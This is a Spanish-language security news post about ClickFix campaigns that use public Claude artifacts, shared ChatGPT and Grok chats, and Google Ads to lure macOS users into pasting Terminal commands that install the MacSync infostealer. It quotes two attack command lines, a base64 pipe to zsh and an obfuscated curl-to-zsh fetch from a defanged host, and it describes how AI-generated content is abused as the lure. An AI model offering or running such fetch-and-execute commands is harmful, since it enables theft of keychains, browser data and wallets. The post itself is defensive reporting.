Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET Mastodon

Entradas populares

PostHeaderIcon Artefactos de Claude LLM utilizados ataques ClickFix en Mac


Actores de amenazas abusan de artefactos de Claude LLM y Google Ads en campañas ClickFix para distribuir malware de robo de información en macOS, engañando a más de 10.000 usuarios con guías falsas que instalan el infostealer MacSync mediante comandos maliciosos en la Terminal.



Los actores de amenazas están abusando de los artefactos de Claude y de Google Ads en campañas de ClickFix que distribuyen malware de robo de información a usuarios de macOS que buscan consultas específicas.

Un artefacto de Claude es contenido generado con LLM de Antropic, publicado por su autor. Puede ser cualquier cosa, desde instrucciones, guías, fragmentos de código u otros tipos de resultados aislados del chat principal y accesibles para cualquier persona a través de enlaces alojados en el dominio claude.ai.

La página de un artefacto advierte a los usuarios que el contenido mostrado fue generado por el usuario y no se ha verificado su exactitud. Se han observado al menos dos variantes de esta actividad maliciosa en la red, y más de 10.000 usuarios han accedido al contenido con instrucciones peligrosas.

Investigadores de Moonlock Lab, la división de investigación de MacPaw, y de AdGuard, empresa de bloqueo de anuncios, observaron que se mostraban resultados de búsqueda maliciosos para múltiples consultas, como "online DNS resolver", "macOS CLI disk space analyzer" y "HomeBrew".

Los investigadores de Moonlock descubrieron que la guía maliciosa de Claude ya ha recibido al menos 15.600 visitas, lo que podría indicar la cantidad de usuarios que caen en la trampa. Los investigadores de AdGuard observaron la misma guía unos días antes, cuando tenía 12.300 visitas.

Los resultados maliciosos promocionados en la búsqueda de Google conducen a un artefacto público de Claude o a un artículo de Medium que suplanta al Soporte Técnico de Apple. En ambos casos, se indica al usuario que pegue un comando de shell en la Terminal.

  • En la primera variante del ataque, el comando de ejecución es: 'echo "..." | base64 -D | zsh,'
  • La segunda variante es: 'true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh'.

Al ejecutar el comando en la Terminal, se obtiene un cargador de malware para el infostealer MacSync, que exfiltra información confidencial del sistema.

Según los investigadores, el malware establece comunicación con la infraestructura de comando y control (C2) mediante un token codificado y una clave API, y suplanta un agente de usuario del navegador macOS para integrarse en la actividad normal. "La respuesta se envía directamente a osascript; AppleScript se encarga del robo (llavero, datos del navegador, monederos de criptomonedas)", afirman los investigadores.

Los datos robados se empaquetan en un archivo comprimido en '/tmp/osalogging.zip' y luego se exfiltran al C2 del atacante en a2abotnet[.]com/gate mediante una solicitud HTTP POST. En caso de fallo, el archivo comprimido se divide en fragmentos más pequeños y la exfiltración se reintenta ocho veces. Tras una carga exitosa, un paso de limpieza elimina todos los rastros.

MoonLock Lab descubrió que ambas variantes obtienen la segunda etapa de la misma dirección C2, lo que indica que el mismo actor de amenazas está detrás de la actividad observada.

Una campaña similar aprovechó la función para compartir chats en ChatGPT y Grok para distribuir el robo de información AMOS. En diciembre de 2025, los investigadores descubrieron que se promovía después de descubrir que las conversaciones de ChatGPT y Grok se estaban utilizando en ataques ClickFix dirigidos a usuarios de Mac.

Se recomienda a los usuarios tener precaución y evitar ejecutar comandos en la Terminal que no comprendan completamente. 

Fuente: BC





Fuentes:
http://blog.segu-info.com.ar/2026/02/artefactos-de-claude-llm-utilizados.html

0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.